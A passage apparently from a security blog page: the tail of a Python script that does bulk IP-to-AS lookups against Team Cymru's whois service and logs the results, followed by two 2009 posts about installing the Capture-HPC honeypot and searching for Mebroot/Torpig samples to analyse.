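    has changed over time (a Registry column was added later)."""
    records = {}
    for line in text.splitlines():
        if not line.strip() or line.startswith(("Bulk mode", "AS ")):
            continue
        fields = [f.strip() for f in line.split("|")]
        if len(fields) < 6:
            continue  # not a data line
        asn, ip, prefix, cc = fields[:4]
        records[ip] = {"asn": asn, "prefix": prefix, "cc": cc,
                       "allocated": fields[-2], "as_name": fields[-1],
                       "raw": line}
    return records


def query_cymru(ips, host=CYMRU_HOST, port=CYMRU_PORT, timeout=30):
    """Send the bulk query over TCP/43 and read until the server closes."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_bulk_query(ips).encode())
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", "replace")


def write_results(records, outdir, logname="cymru_all.log"):
    """One file per IP (named after the IP) plus one global log holding
    every raw response line, which is the layout the post describes."""
    out = Path(outdir)
    out.mkdir(parents=True, exist_ok=True)
    with (out / logname).open("a", encoding="utf-8") as log:
        for ip, rec in records.items():
            (out / f"{ip}.txt").write_text(rec["raw"] + "\n", encoding="utf-8")
            log.write(rec["raw"] + "\n")
    return sorted(p.name for p in out.iterdir())


def lookup_file(iplist_path, outdir="."):
    """The four steps from the post: read the IP list, query, write files."""
    ips = Path(iplist_path).read_text(encoding="utf-8").splitlines()
    return write_results(parse_response(query_cymru(ips)), outdir)


if __name__ == "__main__":
    # Usage: python cymru_as.py ip_list.txt [outdir]
    target = sys.argv[2] if len(sys.argv) > 2 else "."
    print("\n".join(lookup_file(sys.argv[1], target)))
```

Cymru asks that bulk lookups use this begin/end form rather than one connection per IP, which is also why the query is built once for the whole list; unrouted addresses come back with NA in the AS and prefix columns and are kept in the log like any other line.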



Output example:





Monday, May 11, 2009

a "capture-server" night - a different night without IDA

This is the first step of the installation of the capture-client/server project by the HPC project. Thank you very much to the "security watch" owner for his suggestions.

After a couple of hours for installing and finding the stuff needed, it's time for "yet another" screenshot:




Behind the scenes, a good starting guide web site for installing and using HPC Capture Server: http://www.emre.de/wiki/Capture-HPC

Sunday, May 10, 2009

still attempting to retrieve binaries - trying to analyze mebroot (torpig) - part 0.3

I'm still searching for a URL with some sort of binary to analyze. I'm evaluating whether to look for another URL to get mebroot binaries. From the URLs reported by malwaredomainlist.com I can't get anything other than strange URLs.
I got a Symantec report related to 15min.it where URLs for downloading binary stuff are shown. But they seem to be no longer available.

http://safeweb.norton.com/report/show?name=15min.it

Feedback are welcome.